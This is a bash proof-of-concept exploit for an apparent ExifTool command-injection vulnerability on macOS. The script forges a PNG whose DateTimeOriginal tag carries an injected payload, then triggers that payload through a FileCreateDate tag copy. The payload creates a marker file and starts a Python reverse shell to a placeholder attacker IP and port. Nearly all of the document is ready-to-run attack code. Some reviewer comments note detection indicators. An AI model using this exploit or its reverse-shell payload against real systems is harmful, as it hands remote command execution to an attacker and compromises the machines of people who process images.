#!/usr/bin/env bash
# =============================================
# ExifTool CVE-2026-3102 Full PoC (macOS)
# Using your exact Python reverse shell payload
# =============================================

# Verbosity switch: honour a caller-supplied DEBUG, default off. Also controls
# whether the working files are kept at the end of the run (see the cleanup step).
DEBUG="${DEBUG:-0}"

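#######################################
# Print a debug line to stdout when DEBUG=1; print nothing otherwise.
# Globals:   DEBUG (read)
# Arguments: $* - message; backslash escapes are interpreted (%b), as the
#                 previous `echo -e` did
# Returns:   always 0. The former `[[ … ]] && echo` form returned 1 whenever
#            DEBUG was off, which would abort the script if `set -e` were
#            ever enabled; an explicit `if` avoids that.
#######################################
dbg() {
    if [[ "$DEBUG" == "1" ]]; then
        printf '[DEBUG] %b\n' "$*"
    fi
}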

# ================== CONFIG ==================
# ================== CONFIG ==================
KALI_IP="YOUR_ATTACKER_IP_HERE"      # ← CHANGE THIS
KALI_PORT="4444"                     # ← CHANGE THIS
# Marker file the payload creates. Its existence is the only success signal
# the result check below looks at, so this path is a usable indicator for
# anyone triaging a host where this PoC was run.
POC_FILEPATH="/tmp/exiftool_pwned"

# Your exact payload (Python reverse shell)
# The marker `touch` runs before the reverse shell is started, so the result
# check below can report success even when no listener is reachable.
# NOTE(review): KALI_IP and KALI_PORT are interpolated verbatim into the
# embedded Python source; no validation is done on either value.
PAYLOAD="'; touch ${POC_FILEPATH}; (echo 'import socket,subprocess,os;s=socket.socket();s.connect((\"${KALI_IP}\",${KALI_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\"])' | python3 &); #"

# First positional argument overrides the exiftool binary; default is whatever
# `exiftool` resolves to on PATH.
# NOTE(review): this variable is expanded unquoted at both call sites below,
# so a path containing whitespace will be word-split.
PATH_TO_EXIFTOOL="${1:-exiftool}"

echo "[+] ExifTool CVE-2026-3102 PoC - Python Reverse Shell"
dbg "Using payload: ${PAYLOAD}"

# Cleanup old files
# Removes the marker and any leftovers of a previous run so a stale marker
# cannot produce a false "success" in the result check. Errors (e.g. files
# absent) are deliberately silenced.
rm -f "$POC_FILEPATH" benign.png evil.png benign.png_original evil.png_original 2>/dev/null

# =============================================
# 1. Create minimal valid PNG
# =============================================
dbg "[+] Creating 1x1 benign PNG"
# Hand-assembled 1x1 PNG written byte by byte with printf so no image library
# is required: the 8-byte PNG signature, then IHDR, IDAT and IEND chunks
# (each as length, type, data, CRC). Written relative to the current directory.
{
    printf '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A'
    printf '\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89'
    printf '\x00\x00\x00\x0A\x49\x44\x41\x54\x78\x9C\x63\x00\x01\x00\x00\x05\x00\x01\x0D\x0A\x2D\xB4'
    printf '\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82'
} > benign.png

# evil.png starts as a byte-identical copy; only its metadata is altered below,
# which is why the two files are indistinguishable by pixel content.
cp benign.png evil.png

# =============================================
# 2. Inject payload into DateTimeOriginal
# =============================================
dbg "[+] Injecting Python reverse shell payload"
# Writes the payload into DateTimeOriginal of evil.png in place
# (-overwrite_original, so no evil.png_original is left behind). `-n` is
# exiftool's "no print conversion" switch — presumably so the value is stored
# as given; confirm against the exiftool version in use.
# NOTE(review): the exit status is not checked, so if exiftool rejects the
# value the script still proceeds to the trigger step. $PATH_TO_EXIFTOOL is
# unquoted (see CONFIG).
$PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png

# =============================================
# 3. Trigger the vulnerability
# =============================================
dbg "[+] Triggering RCE via FileCreateDate"
# Copies DateTimeOriginal from evil.png into FileCreateDate of benign.png via
# -tagsFromFile; this is the step at which the stored value is consumed.
# NOTE(review): as above, the exit status is ignored and $PATH_TO_EXIFTOOL is
# unquoted. From a monitoring standpoint, exiftool spawning a shell and then
# python3 with a network connection is the observable side effect here.
$PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate<DateTimeOriginal" benign.png

# =============================================
# 4. Check result
# =============================================
# Success is inferred solely from the marker file; the script does not verify
# that the reverse shell actually connected (that is left to the listener).
# The hints in the failure branch repeat the assumptions stated in the header
# and CONFIG; they are not derived from any error output.
if [[ -f "$POC_FILEPATH" ]]; then
    echo "✅ EXPLOIT SUCCESSFUL!"
    echo "   Proof file created → $POC_FILEPATH"
    ls -l "$POC_FILEPATH"
    echo "   Check your netcat listener for reverse shell!"
else
    echo "❌ Exploit did not succeed."
    echo "   Verify:"
    echo "   • macOS target"
    echo "   • ExifTool ≤ 13.49"
    echo "   • Correct KALI_IP and port"
fi

# Cleanup (keep files if debug mode)
# Cleanup (keep files if debug mode)
# `*_original` is intentionally unquoted so the glob expands. The marker file
# in $POC_FILEPATH is NOT removed here — it persists until the next run deletes
# it at startup, so it remains on disk as evidence that the PoC was executed.
# NOTE(review): in debug mode the `[[ … ]] && rm` form returns 1; harmless
# because `set -e` is not enabled in this script.
[[ "$DEBUG" != "1" ]] && rm -f benign.png evil.png *_original 2>/dev/null

echo "[+] PoC finished."